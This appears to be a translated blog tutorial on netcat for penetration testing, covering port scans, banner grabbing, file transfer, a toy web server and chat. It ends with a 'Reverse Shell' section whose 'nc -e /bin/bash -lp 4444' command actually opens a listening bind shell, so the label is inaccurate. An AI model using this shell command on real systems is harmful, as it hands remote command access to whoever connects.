Useful tricks when working with netcat

In this article I will discuss the popular netcat utility and useful tricks when working with it.

Netcat is a Unix utility that allows you to establish TCP and UDP connections, receive data from there and transfer them. Despite their usefulness and simplicity, many people do not know how to use it and unfairly bypass it.

With the help of this utility, you can perform some stages during the penetration testing. This can be useful when there are no installed packages on the attacked machine (or attract attention), there are restrictions (for example, IoT / Embedded devices), etc.

What can be done using netcat:

• Scan ports;
• Redirect ports;
• Collect service banners;
• Listen to the port (bandage for reverse connection);
• Download and upload files;
• Display raw HTTP content;
• Create a mini chat.

In general, with the help of netcat, you can replace the part of unix utilities, so this tool can be considered a kind of combine for performing certain tasks.

Practical examples

In many cases, if it is necessary to check a particular host, they use telnet or their own service providers to identify the host or banner. How netcat can help us:

Check for open TCP port 12345

$ nc -vn 192.168.1.100 12345 

nc: connect to 192.168.1.100 12345 (tcp) failed: Connection refused

 $ nc -v 192.168.1.100 22 

Connection to 192.168.1.100 22 port [tcp / ssh] succeeded!
SSH-2.0-OpenSSH

Scanning TCP ports with netcat:

 $ nc -vnz 192.168.1.100 20-24 

With this scan there will be no connection with the port, but only the output of a successful connection:

nc: connectx to 192.168.1.100 port 20 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 21 (tcp) failed: Connection refused
found 0 associations
found 1 connections:
1: flags = 82 <CONNECTED, PREFERRED>
outif en0
src 192.168.1.100 port 50168
dst 192.168.1.100 port 22
rank info not available
TCP aux info available
Connection to 192.168.1.100 port 22 [tcp / *] succeeded!
nc: connectx to 192.168.1.100 port 23 (tcp) failed: Connection refused
nc: connectx to 192.168.1.100 port 24 (tcp) failed: Connection refused

Scan UDP ports.

To scan UDP ports using nmap, you need root privileges. If they are not there, in this case the netcat utility can also help us:

 $ nc -vnzu 192.168.1.100 5550-5560 

Connection to 192.168.1.100 port 5555 [udp / *] succeeded!

Sending a UDP packet

 $ echo -n "foo" | nc -u -w1 192.168.1.100 161 

This can be useful when interacting with network devices.

Receive data on the UDP port and output the received data

 $ nc -u localhost 7777 

After the first message the output will be stopped. If you need to accept several messages, you must use while true:

 $ while true; do nc -u localhost 7777; done 

File transfer With the help of netcat, you can both receive files and transfer to a remote host:

 nc 192.168.1.100 5555 < 1.txt 

 nc -lvp 5555 > /tmp/1.txt 

Netcact as the simplest web server.

Netcat can serve as the simplest web server to display html pages.

 $ while true; do nc -lp 8888 < index.html; done 

C using a browser at: http: // netcat host : 8888 / index.html. To use the standard web server port number 80, you will have to run nc with root privileges:

 $ while true; do sudo nc -lp 80 < test.html; done 

Chat between nodes

On the first node (192.168.1.100):

 $ nc -lp 9000 

On the second node:

 $ nc 192.168.1.100 9000 

After executing the commands, all characters entered into the terminal window on any of the nodes will appear in the terminal window of the other node.

Reverse Shell

With the help of netcat, you can organize a convenient reverse shell:

 nc -e /bin/bash -lp 4444 

Now you can connect to the remote node:

 $ nc 192.168.1.100 4444 

Do not give up, if there are no tools, often quite cumbersome, sometimes the problem can be solved by improvised means.